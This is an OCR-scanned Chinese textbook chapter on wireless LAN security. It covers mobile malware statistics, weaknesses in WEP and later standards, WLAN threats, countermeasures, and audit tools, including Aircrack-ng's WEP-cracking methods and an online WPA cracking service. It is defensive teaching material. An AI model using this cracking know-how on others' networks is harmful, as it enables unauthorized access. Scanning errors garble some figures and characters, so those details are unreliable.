68. 14% ,继续 占据 市 场 主导 地 位 。 根 据 美 国 最 大 的 风险 基金 KPCB 公司 (Kleiner Perkins 
Caufield & Byers) 公 布 的 数据 ,2011 年 ,3G 普及 率 前 几 名 的 城市 分 别 为 日 本 、 韩 国 .美国 、 
加 拿 大 和 瑞典 。2012 年 日 本 和 韩国 更 是 相继 关闭 了 原 有 的 2G 网 络 ,以 3G 网 络 为 主 , 辅 之 
发 展 4G 网 络 。 

截至 2012 年 12 月 底 ,我 国 移动 通信 用 户 已 达到 11 亿 多 ,其 中 3G 用 户 超过 2.34 亿 , 占 
比 已 经 超过 了 2096 ,可 见 3G 业务 发 展 在 我 国 已 经 进入 快速 通道 。 


7.3 ”无线 网 络 安全 现状 


早期 的 无 线 网 络 标准 安全 性 并 不 完善 ,技术 上 存在 一 些 安全 漏洞 。 随 着 使 用 的 推广 ,更 
多 专家 参与 了 无 线 标准 的 制定 ,使 其 安全 技术 迅速 成 熟 起 来 。 现 在 不 只 是 在 家 庭 、 学 校 、 中 
小 企业 里 边 WLAN 得 到 广泛 应 用 ,在 安全 最 敏感 的 大 企业 、 政 府 机 构 , WLAN 的 安全 可 靠 
性 也 得 到 了 认可 ,并 大 量 地 推广 使 用 。 

2011 年 以 来 ,我 国 移动 互联 网 迅速 发 展 ,手机 网 民 数 量 不 断 增长 ,移动 互联 网 恶意 程序 
数量 和 感染 规模 也 在 不 断 提高 。 恶 意 程序 已 经 严重 威胁 到 用 户 的 切身 利益 和 移动 互联 网 的 
健康 发 展 。 工 业 和 信息 化 部 于 2011 年 11 月 出 台 《 移 动 互联 网 恶意 程序 监测 与 处 置 机 制 》， 
进一步 加 强 移动 互联 网 安全 监管 工作 。CNCERT 持续 对 移动 互联 网 进行 安全 监测 ,监测 结 
果 如 图 7-1 所 示 ,2011 年 国内 移动 互联 网 安全 事件 数量 呈现 快速 增长 趋势 。 


(数据 末 源 : 网 奈 公 司 ) 


6000 


5000 Z 


4000 

3000 — 一 新 增 
2000 —Wtl 
1000 


O 2005 2006 2007 2008 2009 2010 2011 
图 7-1 2005—2011 年 移动 互联 网 恶意 程序 数量 走势 图 
移动 互联 网 恶意 程序 是 指 运行 在 包括 智能 手机 在 内 的 具有 移动 通信 功能 的 移动 终端 
上 ,存在 窍 听 用 户 电话 、 窃 取 用 户 信息 、 破 坏 用 户 数据 ,擅自 使 用 付费 业务 ,发 送 垃圾 信息 、 推 
送 广告 或 欺诈 信息 、 影 响 移动 终端 运行 及 危害 互联 网 网 络 安全 等 恶意 行为 的 计算 机 程序 。 
移动 互联 网 恶意 程序 的 内 涵 比 手机 病毒 广 得 多 ,如 手机 吸 费 软件 不 属于 手机 病毒 ,但 属于 移 
动 互联 网 恶意 程序 。 图 7-2 是 2011 年 捕获 的 移动 互联 网 各 种 恶意 程序 数量 所 占 的 比例 。 


系统 破坏 ，4.11% -资费 消耗 ，0.05%_ geniis, 0.05% 


图 7-2 按 行 为 属性 统计 2011 年 捕获 移动 互联 网 恶意 程序 数量 


7.4 无 线 局 域 网 安全 技术 


无 线 局 域 网 的 安全 技术 这 几 年 得 到 了 快速 的 发 展 和 应 用 。 业 界 常见 的 无 线 局 域 网 安全 
技术 如 下 所 述 。 

。 服务 区 标识 符 (SSID) 匹 配 。 

* 无 线 网 卡 物理 地 址 (MAC) 过 滤 。 

。 有 线 等 效 保密 (WEP) 。 

。 端口 访问 控制 技术 (IEEE802. 1x) 和 可 扩展 认证 协议 (EAP)。 

。 WPACWi-Fi 保护 访问 ) 技 术 。 

。 高 级 的 无 线 局 域 网 安全 标准 一 一 IEEE 802. 11i。 


实践 


7.4.1 SSID 


SSID( Service Set Identifier) 将 一 个 无 线 局 域 网 分 为 几 个 不 同 的 子 网 络 , 每 一 个 子 网 络 
都 有 其 对 应 的 身份 标识 (SSID) ,无 线 终端 只 有 设置 了 配对 的 SSID, 才 可 接 入 相应 的 子 网 
络 。 可 以 认为 SSID 是 一 个 简单 的 口令 ,提供 了 口令 认证 机 制 ,实现 了 一 定 的 安全 性 。 但 是 
这 种 口令 极 易 被 无 线 终端 探测 出 来 ,企业 级 无 线 应 用 绝 不 能 只 依赖 这 种 技术 做 安全 保障 ,而 
只 能 作为 区 分 不 同 无 线 服 务 区 的 标识 。 


7.4.2 MAC 地 址 过 滤 


每 个 无 线 工作 站 网 卡 都 由 唯一 的 物理 地 址 (MAC) 标 识 ,该 物理 地 址 编码 方式 类 似 于 以 
太 网 物理 地 址 ,是 48 位 。 网 络 管理 员 可 在 无 线 局 域 网 访问 点 AP 中 手工 维护 一 组 (不 ) 人 允许 
通过 AP 访问 网 络 地 址 列表 ,以 实现 基于 物理 地 址 的 访问 过 滤 。 

MAC 地 址 过 滤 简 化 了 访问 控制 ,接受 或 拒绝 预先 设 定 的 用 户 , 被 过 滤 的 MAC 不 能 进 
行 访问 ,提供 了 第 2 层 的 防护 。 

MAC 地 址 过 滤 的 缺点 是 , 当 AP 和 无 线 终端 数量 较 多 时 ,大 大 增加 了 管理 负担 ,容易 受 
到 MAC 地 址 伪装 攻击 。 


7.4.3 802.11 WEP 


IEEE 80211. b 标准 规定 了 一 种 称 为 有 线 等 效 保密 (WEP) 的 可 选 加 密 方案 ,其 目的 是 
H WLAN 提供 与 有 线 网 络 相同 级 别 的 安全 保护 。WEP 是 采用 静态 的 有 线 等 同 保密 密 钥 
的 基本 安全 方式 。 静 态 WEP 密 钥 是 一 种 在 会 话 过 程 中 不 发 生变 化 也 不 针对 各 个 用 户 而 变 
化 的 密 钥 。 

WEP 在 传输 上 提供 了 一 定 的 安全 性 和 保密 性 ,能 够 阻止 有 意 或 无 意 的 无 线 用 户 查 看 到 
在 AP fI STA 之 间 传 输 的 内 容 ,其 优点 在 于 : 全 部 报 文 都 使 用 校 验 和 加 密 , 提 供 了 一 些 抵 
抗 自 改 的 能 力 ; 通过 加 密 来 维护 一 定 的 保密 性 ,如 果 没 有 密 钥 ,就 难 把 报 文 解密 ; 容易 实 
现 ; 为 WLAN 应 用 程序 提供 了 非常 基本 的 保护 。 

但 是 静态 WEP 密 钥 对 于 WLAN 上 的 所 有 用 户 都 是 通用 的 ,这 意味 着 如 果 某 个 无 线 设 
备 丢失 或 者 被 次 ,所 有 其 他 设备 上 的 静态 WEP 密 钥 都 必须 进行 修改 ,以 保持 相同 等 级 的 安 
全 性 。 这 将 给 网 络 的 管理 员 带 来 非常 费时 费力 的 管理 任务 。WEP 标准 中 并 没有 规定 共享 
密 钥 的 管理 方案 ,通常 是 手工 进行 配置 与 维护 。 由 于 同时 更 换 密 钥 费 时 又 困难 ,所 以 密 钥 通 
常 长 时 间 使 用 而 很 少 更 换 。 例 如 ICV 是 一 种 基于 CRC-32 的 用 于 检测 传输 噪音 和 普通 错误 
的 算法 。 而 CRC-32 是 信息 的 线性 函数 ,这 意味 着 攻击 者 可 以 算 改 加 密 信息 ,并 很 容易 地 修 
改 ICV ,使 信息 表面 上 看 起 来 是 可 信 的 。 在 RC4 中 ,人 们 发 现 了 弱 密 钥 。 所 谓 弱 密 钥 ,就 是 
密 钥 与 输出 之 间 存 在 超出 一 个 好 密码 所 应 具有 的 相关 性 。 攻 击 者 收集 到 足够 使 用 弱 密 钥 的 
包 后 ,就 可 以 对 它们 进行 分 析 , 只 须 尝 试 很 少 的 密 钥 就 可 以 接 入 网 络 。 基 于 WEP 的 共享 密 
钥 认证 的 目的 就 是 实现 访问 控制 ,然而 事实 却 截然 相反 ,只 要 通过 监听 一 次 成 功 的 认证 , 攻 


击 者 以 后 就 可 以 伪造 认证 。 启 动 共享 密 钥 认证 实际 上 降低 了 网 络 的 总 体 安全 性 ,使 猜 中 
WEP 密 钥 变 得 非常 容易 。 

为 了 提供 更 高 的 安全 性 ,Wi-Fi 工作 组 提供 了 WEP2 技术 , 相 比 于 WEP 算法 ,该 技术 
将 WEP 密 钥 的 长 度 由 40 位 加 长 到 128 位 ,初始 化 向 量 IV 的 长 度 由 24 位 加 长 到 128 位 。 然 
而 WEP 算法 的 安全 漏洞 是 由 于 WEP 机 制 本 身 引 起 的 ,与 密 钥 的 长 度 无 关 ,即使 增加 加 密 密 
钥 的 长 度 , 也 不 可 能 增强 其 安全 程度 。 也 就 是 说 WEP2 算法 并 没有 起 到 提高 安全 性 的 作用 。 


7.4.4 802.1x/EAP 用 户 认 证 


802. 1x 是 针对 以 太 网 提出 的 基于 端口 进行 网 络 访问 控制 的 安全 性 标准 草案 。 基 于 端 
口 的 网 络 访问 控制 利用 物理 层 特性 对 连接 到 LAN 端口 的 设备 进行 身份 认证 。 如 果 认 证 失 
败 , 则 禁止 该 设备 访问 LAN 资源 。 

尽管 802. 1x 标准 最 初 是 为 有 线 以 太 网 设计 制定 的 ,但 它 也 适用 于 符合 802. 11 标准 的 
无 线 局 域 网 , 且 被 视 为 是 WLAN 的 一 种 增强 型 网 络 安全 解决 方案 。802. 1x 体系 结构 包括 
如 下 3 个 主要 的 组 件 。 

* 请 求 方 (Supplicant) ; 提出 认证 申请 的 用 户 接 入 设备 ,在 无 线 网 络 中 通常 指 待 接 入 
网 络 的 无 线 客户 机 STA, 
认证 方 (Authenticator) : 允许 客户 机 进行 网 络 访问 的 实体 ,在 无 线 网 络 中 通常 指 访 
问 接 人 点 AP。 
认证 服务 器 (Authentication Sever) : 为 认证 方 提 供认 证 服务 的 实体 。 认 证 服务 器 
对 请 求 方 进行 验证 ,然后 告知 认证 方 该 请 求 者 是 否 为 授权 用 户 。 认 证 服务 器 可 以 是 
某 个 单独 的 服务 器 实体 ,也 可 以 不 是 ,后 一 种 情况 通常 是 将 认证 功能 集成 在 认证 方 
Authenticator 中 。 

802. 1x 草案 为 认证 方 定 义 了 两 种 访问 控制 端口 , 即 受 控 端 口 和 非 受 控 端 口 。 受 控 端 口 
分 配给 那些 已 经 成 功 通过 认证 的 实体 进行 网 络 访问 ; 而 在 认证 尚未 完成 之 前 ,所 有 通信 数 
据 流 从 非 受 控 端口 进出 。 非 受 控 端 口 只 允许 通过 802. 1x 认证 数据 ,一 旦 认证 成 功 通过 ,请 
求 方 就 可 以 通过 受 控 端 口 访问 LAN 资源 和 服务 EQ 7-3 列 出 了 802. 1x 认证 前 后 的 迎 辑 示 
意图 。 


1 802.1x 认 证 系统 | 802.1x 认 证 系统 | 
| ZERO 非 受 控 端口 ! | 受 控 端口 zron | 
! 1 1 1 
1 1 l 1 
| WES 1 已 认证 1 
NC HE e x 
1 L 1 1 
| EE ' 
h l 1 


认证 前 


图 7-3 认证 前 后 逻辑 示意 图 
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802. 1x 技术 是 一 种 增强 型 的 网 络 安全 解决 方案 。 在 采用 802. 1x 的 无 线 LAN 中 ,无 线 
用 户 端 安装 802. 1x 客户 端 软件 作为 请 求 方 , 无 线 访问 点 AP Wq 802. 1x 认证 代理 作为 认 
证 方 , 同 时 它 还 作为 Radius 认证 服务 器 的 客户 端 ,负责 用 户 与 Radius 服务 器 之 间 认 证 信息 
的 转发 。 

802. 1x 认证 一 般 包 括 以 下 几 种 EAPCExtensible Authentication Protocol) 认 证 模式 。 

* EAP-MD5, 

* EAP-TLS(Transport Layer Security) 。 

* EAP-TTLS(Tunnelled Transport Layer Security) 。 
EAP-PEAP(Protected EAP), 

* EAP-LEAP(Lightweight EAP), 

* EAP-SIM, 

802. 1x 认证 技术 的 优势 是 仅仅 关注 受 控 端 口 的 打开 与 关闭 ; 接 入 认证 通过 之 后 ,IP 数 
据 包 在 二 层 普通 MAC 帧 上 传送 ; 由 于 是 采用 Radius 协议 进行 认证 ,所 以 可 以 很 方便 地 与 
其 他 认证 平台 进行 对 接 ; 可 以 提供 基于 用 户 的 计 费 系统 。 

802. 1x 认证 技术 的 缺点 是 只 提供 用 户 接 入 认证 机 制 ,没有 提供 认证 成 功 之 后 的 数据 加 
密 ; 只 提供 单 向 认证 ; 提供 STA 与 RADIUS 服务 器 之 间 的 认证 ,而 不 是 与 AP 之 间 的 认 
证 ; 用 户 的 数据 仍然 是 使 用 RC4 进行 加 密 。 


7.4.5 WPA(802. 11i) 


802. 11i 是 新 一 代 WLAN 安全 标准 。 为 了 使 WLAN 技术 从 安全 性 得 不 到 很 好 保障 的 
困境 中 解脱 出 来 ,IEEE 802. 11 的 i 工作 组 致力 于 制定 称 为 IEEE 802. 11i 的 新 一 代 安全 标 
准 , 这 种 安全 标准 是 为 了 增强 WLAN 的 数据 加 密 和 认证 性 能 ,定义 了 RSN (Robust 
Security Network) 的 概念 ,并 且 针 对 WEP 加 密 机 制 的 各 种 缺陷 做 了 多 方面 的 改进 。 

IEEE 802. 11i 规定 使 用 802. 1x 认证 和 密 钥 管理 方式 ,在 数据 加 密 方面 定义 了 TKIP 
(Temporal Key Integrity Protocol) , CCMP(Counter-Mode/CBC-MAC Protocol) fll WRAP 
(Wireless Robust Authenticated Protocol) 3 种 加 密 机 制 。 其 中 ,TKIP 采用 WEP 机 制 里 
的 RC4 作为 核心 加 密 算法 ,可 以 通过 在 现 有 的 设备 上 升级 固件 和 驱动 程序 的 方法 达到 提高 
WLAN 安全 的 目的 ; CCMP 机 制 基于 AES(Advanced Encryption Standard) 加 密 算法 和 
CCM(Counter-Mode/CBC-MAC) 认 证 方式 ,使 得 WLAN 的 安全 程度 大 大 提高 ,是 实现 
RSN 的 强制 性 要 求 。 

WPA 是 向 IEEE 802. 11i 过 渡 的 中 间 标 准 。 市 场 对 于 提高 WLAN 安全 的 需求 是 十 分 
紧迫 的 ,IEEE 802. 11i 的 进展 并 不 能 满足 这 一 需要 。 在 这 种 情况 下 , Wi-Fi 联盟 制定 了 
WPACWi-Fi Protected Access) 标 准 。WPA 是 IEEE 802. 11i 的 一 个 子 集 , 其 核心 就 是 
IEEE 802. 1x 和 TKIP, WPA 与 IEEE 802. 11i 的 关系 如 图 7-4 所 示 。 

WPA 采用 了 802. 1x 和 TKIP 来 实现 WLAN 的 访问 控制 、 密 钥 管 理 与 数据 加 密 。 
802. 1x 是 一 种 基于 端口 的 访问 控制 标准 。TKIP 基于 RC4 加 密 算法 , 另 引 入 了 如 下 4 个 新 
算法 。 

。 扩展 的 48 位 初始 化 向 量 (IV) 和 IV 顺序 规则 (IV Sequencing Rules), 
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WRAP 


图 7-4 WPA 5 IEEE 802. 11i 的 关系 


* 每 包 密 钥 构 建 机 制 (per-packet key construction) , 

* Michael(Message Integrity Code, MIC) 消 息 完整 性 代码 。 

。 密 钥 重新 获取 和 分 发 机 制 。 

WPA 系统 在 工作 的 时 候 , 先 由 AP 向 外 公布 自身 对 WPA 的 支持 ,在 Beacons, Probe 
Response 等 报 文中 使 用 新 定义 的 WPA 信息 元 素 (Information Element) ,这 些 信息 元 素 中 
包含 了 AP 的 安全 配置 信息 (包括 加 密 算法 和 安全 配置 等 信息 )。STA 根据 收 到 的 信息 选 
择 相应 的 安全 配置 ,并 将 所 选择 的 安全 配置 标示 在 其 发 出 的 Association Request 和 Re- 
Association Request 报 文中 。WPA 通过 这 种 方式 来 实现 STA 与 AP 之 间 的 加 密 算法 以 及 
密 钥 管理 方式 的 协商 。 

在 STA 以 WPA 模式 与 AP 建立 关联 之 后 ,如 果 网 络 中 有 RADIUS 服务 器 作为 认证 服 
务 器 ,那么 STA 就 使 用 802. 1x 方式 进行 认证 ; 如 果 网 络 中 没有 RADIUS,STA 与 AP 就 会 
采用 预 共 享 密 钥 (Pre-Shared Key, PSK) HIJI. 

在 WPA 中 ,AP 支持 WPA 和 WEP 无线 客 户 端的 混合 接 入 。 在 STA 与 AP 建立 关联 
时 ,AP 可 以 根据 STA 的 Association Request 中 是 否 带 有 WPA 信息 元 素来 确定 哪些 客户 
端 支持 使 用 WPA。 但 是 在 混合 接 入 的 时 候 , 所 有 WPA 客户 端 所 使 用 的 加 密 算法 都 得 使 用 
WEP, 这 就 降低 了 无 线 局 域 网 的 整体 安全 性 。 

尽管 WPA 在 安全 性 方面 相 较 WEP 有 了 很 大 的 改善 和 加 强 , 但 WPA 只 是 一 个 临时 的 
过 渡 性 方案 ,WPA2(802. 11iD) 中 将 会 全 面 采用 AES 加 密 机 制 机 制 。 

非法 接 人 、 带 宽 盗 用 .假冒 AP. WEP 破解 工具 等 这 些 安全 问题 一 直 伴 随 着 无 线 网 络 ， 
关于 无 线 网 络 的 安全 问题 ,也 是 一 个 讨论 了 很 长 时 间 的 话题 。 安 全 问题 应 该 分 为 两 方面 来 
关注 ,一 方面 ,硬件 厂商 和 行业 组 织 的 应 该 致力 于 新 技术 的 推出 和 新 标准 的 统一 ; 另 一 方 
面 ,用 户 的 安全 意识 更 为 关键 。 

无 线 网 络 的 安全 级 别 与 网 络 的 部 署 者 有 着 直接 的 关系 。 由 网 通 . 电 信 等 ISP 部 署 的 较 
大 型 的 无 线 网 络 安全 机 制 都 会 比较 完善 ,使 用 者 将 会 被 强制 进行 身份 认证 ,同时 网 络 内 部 的 
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安全 保护 机 制 也 比较 完善 。 与 之 相 比 ,家 庭 、 企 业 热点 的 无 线 网 络 成 为 了 安全 事件 频 发 的 
重 灾区 ,因为 这 些 中 小 规模 的 无 线 网 络 大 多 是 由 系统 集成 商 或 用 户 自己 完成 部 署 的 ,而 部 署 
者 的 安全 意识 ,技术 水 平 参 差 不 齐 , 对 硬件 设备 的 投入 也 不 同 ,这 就 势必 造成 了 中 小 规模 无 
线 网 络 的 安全 性 较 低 ,为 非法 和 人 侵 者 提供 了 可 乘 之 机 。 

当前 设备 的 安全 机 制 已 经 比较 丰富 ,大 多 数 无 线 产品 都 会 具备 WEP/WPA/WPA2/ 
WPA2-PSK 加 密 、 隐 藏 SSID. MAC 黑白 名 单 、 内 部 用 户 隔 离 .802. 1q VLAN 及 非法 AP 检 
测 等 功能 ,一些 高 端 产品 还 自 带 了 802. 1x 认证 数据 库 。 用 户 如 果 能 够 充分 利用 硬件 设备 提 
供 的 这 些 安全 机 制 ,那么 其 无 线 网 络 的 安全 性 将 会 大 大 提高 ,完全 能 够 令 绝 大 部 分 人 侵 者 知 
难 而 退 。 但 目前 有 相当 一 部 分 家 庭 、 企 业 乃 至 热点 的 无 线 网 络 仍然 因为 各 种 原因 处 在 * 裸 
奔 ” 的 状态 ,有 些 甚至 还 为 非法 接 入 者 提供 了 DHCP* 服 务 ”。 

目前 ,常见 的 Wi-Fi 安全 技术 包括 WEP、WPA 以 及 WPA2 等 ,它们 都 试图 通过 加 密 手 
段 防止 无 线 信号 被 截取 。 目 前 ,用 户 只 需 简 单 的 设 定 ,AP 就 会 自动 启用 安全 加 密 机 制 , 生 
成 密 钥 ,并 把 安全 配置 直接 “强行 推 入 ?无线 客户 端 ,而 无 须 进行 其 他 复杂 配置 。 


7.5 无 线 网 络 安全 威胁 


在 一 个 无 线 局 域 网 接 入 点 所 服务 的 区 域 中 ,任何 一 个 无 线 客户 端 都 可 以 接收 到 此 接 入 
点 的 电磁 波 信 号 ,包括 一 些 恶 意 用 户 可 以 接收 到 其 他 无 线 数据 信号 ,相对 于 在 有 线 局 域 网 当 
中 窃听 或 干扰 信息 就 容易 得 多 。 

WLAN 所 面临 的 安全 威胁 主要 有 以 下 几 类 。 


1. 有 线 等 效 保密 机 制 的 弱点 


IEEE 制定 的 802. 11 标准 中 引入 WEP 机 制 的 目的 是 提供 与 有 线 网 络 中 功能 等 效 的 安 
全 措施 ,防止 出 现 无 线 网 络 用 户 偶然 被 窃听 的 情况 出 现 。 然 而 ,如 前 所 述 , WEP 最 终 还 是 被 
发 现 了 自身 存在 许多 的 弱点 。WEP 很 容易 被 黑客 攻破 的 另外 一 个 原因 是 许多 用 户 安全 意 
识 淡薄 ,没有 改变 默认 的 配置 选项 ,而 默认 的 加 密 设置 都 是 比较 简单 脆弱 的 ,经 不 起 黑客 的 
攻击 。 

2. 进行 搜索 攻击 


进行 搜索 也 是 攻击 无 线 网 络 的 一 种 方法 ,现在 有 很 多 针对 无 线 网 络 识 别 与 攻击 的 技术 和 
软件 。NetStumbler 软件 是 第 一 个 被 广泛 用 来 发 现 无 线 网 络 的 软件 。 很 多 无 线 网 络 是 不 使 用 
加 密 功 能 的 ,或 即使 加 密 功 能 是 处 于 活动 状态 ,如 果 没 有 关闭 AP(wirelessAccessPoint, 无 线 基 
站 ) 广 播 信息 功能 ,AP 广播 信息 中 仍然 包括 许多 可 以 用 来 推断 出 WEP 密 钥 的 明文 信息 ,如 
网 络 名 称 .SSID(SecureSetIdentifier, 安 全 集 标识 符 ) 等 可 给 黑客 提供 入 侵 的 条 件 。 


3. 信息 泄露 威胁 


信息 泄露 威胁 包括 窃听 、 截 取 和 监听 。 穷 听 是 指 偷 听 流 经 网 络 的 计算 机 通信 的 电子 形 
式 , 它 是 以 被 动 和 无 法 觉察 的 方式 入侵 检测 设备 的 。 一 般 说 来 ,大 多 数 网 络 通信 都 是 以 明文 
( 非 加 密 ) 格 式 出 现 的 ,这 就 会 使 处 于 无 线 信号 覆盖 范围 之 内 的 攻击 者 可 以 乘机 监视 并 破解 


( 读 取 ) 通 信 。 这 类 攻击 是 企业 管理 员 面 临 的 最 大 安全 问题 。 即 使 网 络 不 对 外 广播 网 络 信 
息 ,只 要 能 够 发 现 明文 信息 ,攻击 者 仍然 可 以 使 用 一 些 网 络 工 具 ( 如 AiroPeek 和 
TCPDump) 来 监听 和 分 析 通 信和 量 ,从 而 识别 出 可 以 破解 的 信息 。 


4. 无 线 网 络 身份 验证 欺骗 


欺骗 这 种 攻击 手段 是 通过 骗 过 网 络 设 备 ,使 得 它们 错误 地 认为 来 自 它们 的 连接 是 网 络 
中 合法 的 和 经 过 同意 的 机 器 发 出 的 ,进而 达到 欺骗 的 目的 ,最 简单 的 防御 方法 是 重新 定义 无 
线 网 络 或 网 卡 的 MAC 地 址 。 

由 于 TCP/IP 的 设计 原因 ,几乎 无 法 防止 MAC/IP 地 址 欺骗 ,虽然 通过 静态 定义 MAC 
地 址 表 能 一 定 程度 上 防止 这 种 类 型 的 攻击 ,但 是 因为 巨大 的 管理 负担 ,这 种 方案 很 少 被 采 
用 。 只 有 通过 智能 事件 记录 和 监控 日 志 才 可 以 对 付 已 经 出 现 过 的 欺骗 。 当 试图 连接 到 网 络 
上 的 时 候 ,简单 地 通过 让 另外 一 个 节点 重新 向 AP 提交 身份 验证 请 求 , 就 可 以 很 容易 地 欺骗 
无 线 网 身份 验证 。 


5. 网 络 接管 与 算 改 


同样 因为 TCP/IP 设计 的 原因 ,在 没有 足够 的 安全 防范 措施 的 情况 下 ,无 线 网 络 很 容易 
受到 利用 非法 AP 进行 的 中 间 人 欺骗 攻击 。 某 些 欺骗 技术 可 供 攻 击 者 接管 为 无 线 网 上 其 他 
资源 建立 的 网 络 连 接 。 如 果 攻 击 者 接管 了 某 个 AP, 那 么 所 有 来 自 无 线 网 的 通信 量 都 会 传 
到 攻击 者 的 机 器 上 ,包括 其 他 用 户 试图 访问 合法 网 络 主机 时 需要 使 用 的 密码 和 其 他 信息 。 
欺诈 AP 攻击 通常 不 会 引起 用 户 的 怀疑 ,用 户 通常 是 在 毫 无 防范 的 情况 下 输入 自己 的 身份 
验证 信息 ,甚至 在 接 到 许多 SSL 错误 或 其 他 密 钥 错 误 的 通知 之 后 仍 像 是 看 待 自己 机 器 上 的 
错误 一 样 看 待 它们 ,这 让 攻击 者 可 以 继续 接管 连接 ,而 不 容易 被 别人 发 现 。 

解决 这 种 攻击 的 通常 做 法 是 采用 双向 认证 方法 ( 即 网 络 认证 用 户 ,同时 用 户 也 认证 网 
络 ) 和 基于 应 用 层 的 加 密 认 证 (如 HTTPS-- WEB), 


6. 拒绝 服务 攻击 


无 线 信号 传输 的 特性 和 专门 使 用 扩 频 技术 ,使 得 无 线 网 络 特别 容易 受到 拒绝 服务 攻击 
的 威胁 。 拒 绝 服务 是 指 攻 击 者 恶意 占用 主机 或 网 络 几 乎 所 有 的 资源 ,使 得 合法 用 户 无 法 获 
得 这 些 资源 。 黑 客 通过 让 不 同 的 设备 使 用 相同 的 频率 ,从 而 造成 无 线 频谱 内 出 现 冲 突 ; 攻 
击 者 发 送 大 量 非法 (或 合法 ) 的 身份 验证 请 求 ; 如 果 攻 击 者 接管 AP, 并 且 不 把 通信 量 传递 到 
恰当 的 目的 地 ,那么 所 有 网 络 用 户 都 将 无 法 使 用 网 络 。 无 线 攻击 者 可 以 利用 高 性 能 的 方向 
性 天 线 从 很 远 的 地 方 攻 击 无 线 网 ,已 经 获得 有 线 网 访问 权 的 攻击 者 ,可 以 通过 发 送 多 达 无 线 
AP 无 法 处 理 的 通信 量 进行 攻击 。 


7. 用 户 设备 安全 威胁 


由 于 IEEE 802. 11 标准 规定 WEP 加 密 给 用 户 分 配 是 一 个 静态 密 钥 ,因此 只 要 得 到 了 
一 块 无 线 网 网 卡 , 攻 击 者 就 可 以 拥有 一 个 无 线 网 使 用 的 合法 MAC 地 址 。 也 就 是 说 ,如 果 终 
端 用 户 的 笔记 本 电脑 被 盗 或 丢失 ,其 丢失 的 不 仅仅 是 电脑 本 身 , 还 包括 设备 上 的 身份 验证 信 
息 ,如 网 络 的 SSID 及 密 钥 。 


实践 


7.6 无 线 局 域 网 安全 措施 


为 了 有 效 保障 无 线 局 域 网 的 安全 性 ,就 必须 实现 以 下 几 个 安全 目标 。 

(1) 提供 接 入 控制 : 验证 用 户 , 授 权 他 们 接 入 特定 的 资源 ,同时 拒绝 为 未 经 授权 的 用 户 
提供 接 入 。 

(2) 确保 连接 的 保密 与 完好 : 利用 强 有 力 的 加 密 和 校 验 技术 ,防止 未 经 授权 的 用 户 窃 
听 、 插 入 或 修改 通过 无 线 网 络 传输 的 数据 。 

(3) 防止 拒绝 服务 攻击 : 确保 不 会 有 用 户 占 用 某 个 接 入 点 的 所 有 可 用 带宽 ,以 免 影响 
其 他 用 户 的 正常 接 入 。 

(4) 对 于 自己 搭建 无 线 网 络 的 用 户 ,至 少 要 进行 一 些 最 基本 的 安全 配置 ,如 隐藏 SSID, 
关闭 DHCP .设置 WEP 密 钥 、 启 用 内 部 隔离 等 。 

(5) 如 果 安 全 要 求 再 高 一 些 ,还 可 以 启用 非法 AP 监测 ,配置 MAC 过 滤 , 启 用 WPA/ 
WPA2 ,建立 802. 1x 端口 认证 。 

(6) 如 果 有 更 高 的 安全 需求 ,可 以 选择 的 安全 手段 更 多 ,比如 使 用 定向 天 线 , 调 整 发 射 
功率 ,把 信号 尽 可 能 收敛 在 信任 的 范围 之 内 ; 还 可 以 将 无 线 局 域 网 视 为 Internet 一 样 来 防 
御 , 甚 至 在 接口 处 部 署 入 侵 检 测 系统 。 

(7) 如 果 是 企业 用 户 , 需 要 建立 完善 的 安全 管理 制度 并 分 发 至 员工 。 

(8) 当 在 热点 区 域 使 用 无 线 网 络 时 ,如 果 认 定 网 络 不 够 安全 ,尽量 不 要 在 此 网 络 中 提交 
或 透露 敏感 信息 ,并 尽量 缩短 在 线 时 间 。 


7.7. 无 线 网 络 安全 测试 工具 

Wi-Fi 安全 测试 工具 可 以 帮助 用 户 发 现 恶 意 访问 点 、 注 弱 Wi-Fi 密码 以 及 其 他 安全 漏 
洞 , 从 而 保证 在 被 攻击 之 前 做 好 防护 工作 。 

1. Vistumbler 


Vistumbler 算是 一 款 较 新 的 开源 扫描 程序 ,Vistumbler 能 搜寻 到 附近 的 所 有 无 线 网 
络 , 并 且 在 上 面 附加 信息 ,如 活跃 .MAC 地 址 .SSID. 信 号 频道, 认证 ,加密 和 网 络 类 型 。 它 
可 显示 基本 的 AP 信息 ,包括 精确 的 认证 和 加 密 方式 ,甚至 可 显示 SSID 和 RSSI 
Vistumbler 还 支持 GPS 设备 ,与 当地 不 同 的 Wi-Fi 网 络 连接 ,输出 其 他 格式 的 数据 。 


2. Kismet 


Kismet 是 一 款 工作 在 802. 11 协议 第 二 层 的 开源 无 线 网 络 检测 、 嗅 探 . 干 扰 工 具 , 可 以 
工作 在 支持 raw 监控 模式 的 所 有 无 线 网 卡 上 ,可 以 嗅 探 包 括 802. 11b,802. 11a 和 802. 11g 
在 内 的 协议 包 。 


3. Wi-Fi Analyzer 


Wi-Fi Analyzer 是 一 款 免 费 的 Android 应 用 工具 ,可 以 在 Android 平台 的 移动 终端 上 寻 


找 AP。 它 能 将 2. 4GHz 信道 AP 的 所 有 详细 信息 都 一 一 列 出 ,也 支持 SGHz 信道 的 其 他 设 
备 。 用 户 还 可 以 将 AP 的 详细 信息 以 XML 格式 输出 ,并 通过 邮件 或 者 其 他 应 用 程序 、 截 屏 
等 形式 实现 共享 。 它 会 根据 信道 信号 强度 ,使 用 率 、 信 号 远近 以 图 形 方式 直观 展现 。 


4. Aircrack-ng 


Aircrack-ng 是 一 款 用 于 破解 无 线 802. 11WEP 及 WPA-PSK 加 密 的 工具 ,主要 使 用 了 
两 种 攻击 方式 进行 WEP 破解 ,一 种 是 FMS 攻击 ,该 攻击 方式 是 以 发 现 该 WEP 漏洞 的 研究 
人 员 名 字 (Scott Fluhrer Itsik Mantin 及 Adi Shamir) 所 命名 的 ; 另 一 种 是 KoreK 攻击 。 

它 也 可 以 帮助 管理 员 进 行 无 线 网 络 密码 的 脆弱 性 检查 及 了 解 无 线 网 络 信号 的 分 布 情 
况 , 包 含 了 多 款 工具 的 无 线 攻 击 审计 套装 ,非常 适合 对 企业 进行 无 线 安全 审计 时 使 用 。 


5. CloudCracker 


CloudCracker 是 一 款 商业 版 在 线 密码 破解 服务 ,除了 可 以 提供 WPA/WAP2 PSK 密码 
破解 ,还 可 以 用 来 破解 密码 保护 文档 和 哈 希 密码 。 通 过 使 用 3 亿 文 字 容 量 的 字典 攻击 能 够 
快速 实现 密码 破解 。 用 户 只 需要 将 捕获 到 的 PA/WPA2 握手 文件 或 者 文档 、 喻 希 值 的 
PWDUMP 文件 上 传 , 即 可 立即 破解 。 


6. FreeRadius-WPE 


